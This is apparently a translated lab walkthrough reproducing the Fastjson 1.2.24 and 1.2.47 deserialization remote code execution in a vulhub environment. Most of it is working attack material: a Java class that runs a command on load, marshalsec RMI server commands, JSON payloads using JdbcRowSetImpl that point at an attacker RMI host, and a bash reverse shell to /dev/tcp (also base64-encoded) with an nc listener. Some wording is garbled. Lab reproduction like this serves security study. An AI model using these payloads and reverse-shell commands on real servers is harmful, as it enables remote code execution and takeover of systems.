Fastjson 1.2.24 deserialization vulnerability reappears

Fastjson 1.2.24 deserialization vulnerability reappears

1. Vulnerability introduction

FastjsonEngine is one of the JSON processing engines. Fastjson is one of the Java-based JSON parsers/generators. There is a security vulnerability in the parseObject version of Fastjson before 1.2.25 used by FastjsonEngine in Pippo version 1.11.0. When using fastjson autotype to process json objects, the security of the @type field is not verified. An attacker can pass in a dangerous class and call the dangerous class to connect to the remote RMI host, and execute code through the malicious class to affect the version.

Vulnerability affected versions

Fastjson<1.2.25

Vulnerability exploitation principle:

sends a malicious json format payload in the request package. When processing the json object, the vulnerability does not filter the @type field, which allows the attacker to pass in the malicious TemplatesImpl class, and this class has a The field is _bytecodes. Some functions will generate java instances based on this _bytecodes. This allows fastjson to pass in a class through the field, and then execute it when the class is generated. Constructor.

2. Vulnerability environment construction

UbuntuKōroki ip: 192.168.241.129

Kail kail ip: 192.168.241.128

vulhub enters /vulhub-master/fistjion/1.2.24-rce

Use command:

docker-compose up -d

Visit: ip+8090

http://192.168.241.129:8090

After the environment is running, visithttp://your-ip:8090 to see the output in JSON format

3. Vulnerability recurrence

1. First compile and upload the command execution code, TouchFile.java

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    
    
    static {
    
    
        try {
    
    
            Runtime rt = Runtime.getRuntime();
            String[] commands = {
    
    "touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
    
    
            // do nothing
        }
    }
}

Save the above code as TouchFile.java and execute it in the current directory

javac TouchFile.java

After execution, a TouchFile.class file will be generated.

2. Use the Java deserialization tool marshalsec to assist in opening the RMI environment

git clone https://github.com/mbechler/marshalsec

After downloading, enter the directory and use cmd, and use the following command to compile

mvn clean package -DskipTests		//使用mvn命令前需要确认maven安装

With the help of the marshalsec project, start an RMI server, listen on the port, and specify the remote class TouchFile.class to load and execute

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.241.128:4444/#TouchFile" 9999

3. In the directory where the compiled class file is located, use python to enable monitoring.

python -m SimpleHTTPServer 4444

SimpleHTTPServer is a module that comes with Python 2 and is a Python web server. In Python 3 it has been merged into the http.server module. If you do not specify a port number, the default is port 8000. Just use the web in the LAN to access http:/IP:8000

python2语法：python -m SimpleHTTPServer 
python3语法：python -m http.server

4. Send payload and rebound shell

Send the Payload to the shooting range server with the RMI address:

POST / HTTP/1.1
Host: 192.168.241.129:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.241.128:9999/TouchFile",
        "autoCommit":true
    }
}

5. Check the rebound shell and enter the target machine to check whether the command is executed successfully.

You can see the monitoring information and the connection has been established.

Enter the drone

View container id

docker ps

Execute the following command to check whether the remote command is executed:

docker exec -it 9ec77798e0bf /bin/bash		

You can see that the execution was successful,

If you want to change the execution command, just change the following command in Touch.java:

String[] commands = {"touch", "/tmp/success"};

4.fastjson 1.2.47 deserialization vulnerability reappears

1.Normal recurrence

The basic steps are the same as above

The poc is as follows:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://192.168.241.128:9999/Exploit", 
        "autoCommit": true
    }
}

2. Use tools to reproduce

download link:

https://github.com/zhzyker/exphub

fastjson_tool.jar
fastjson-1.2.47_rce.py

Host B starts the RMI service and loads the remote malicious java class.

bash -i >& /dev/tcp/192.168.241.128/6666 0>&1 //需要base64编码
java -cp fastjson_tool.jar fastjson.HRMIServer 192.168.241.128 9998 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0MS4xMjgvNjY2NiAwPiYx==}|{base64,-d}|{bash,-i}"

Start nc to listen on port 6666

nc -lnvp 6666

Send a malicious java class that exploits the fastjson deserialization vulnerability to cause the target machine to execute RMI services to execute remote commands.

python3 fastjson-1.2.47_rce.py http://192.168.241.129:8090 rmi://192.168.241.128:9998/Object

However, there is no rebound shell